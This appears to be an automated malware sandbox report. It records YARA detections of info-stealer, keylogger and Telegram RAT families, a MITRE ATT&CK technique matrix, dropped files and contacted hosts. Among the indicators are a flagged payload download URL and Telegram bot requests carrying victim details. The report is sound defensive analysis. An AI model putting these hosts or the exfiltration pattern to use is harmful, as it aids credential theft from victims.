Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	241 Security Software Discovery	VNC	GUI Input Capture	124 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yxU3AgeVTi.exe	35%	Virustotal		Browse
yxU3AgeVTi.exe	26%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Libraries\Aiymwhpj.PIF	24%	ReversingLabs
C:\Users\Public\Libraries\jphwmyiA.pif	3%	ReversingLabs

Source	Detection	Scanner	Label
http://amazonenviro.com/	0%	Avira URL Cloud	safe
http://amazonenviro.com:80/245_Aiymwhpjxsg4	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_Aiymwhpjxsge	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_Aiymwhpjxsg	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_Aiymwhpjxsgf	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	false	high
mail.techniqueqatar.com	208.91.198.176	true	true	unknown
amazonenviro.com	166.62.27.188	true	true	unknown
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:23:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://amazonenviro.com/245_Aiymwhpjxsg	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:03:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:33:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.office.com/	jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	jphwmyiA.pif, 00000003.00000002.4142559161.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AFA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AAC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3168912288.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3169435393.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.2027254818.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402399115.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D092000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402272086.000000002D092000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3479599442.000000001E46F000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4126393481.000000001967A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4140359684.000000001E472000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4140089339.000000001E3C0000.00000004.00000020.00020000.00000000.sdmp	false		high
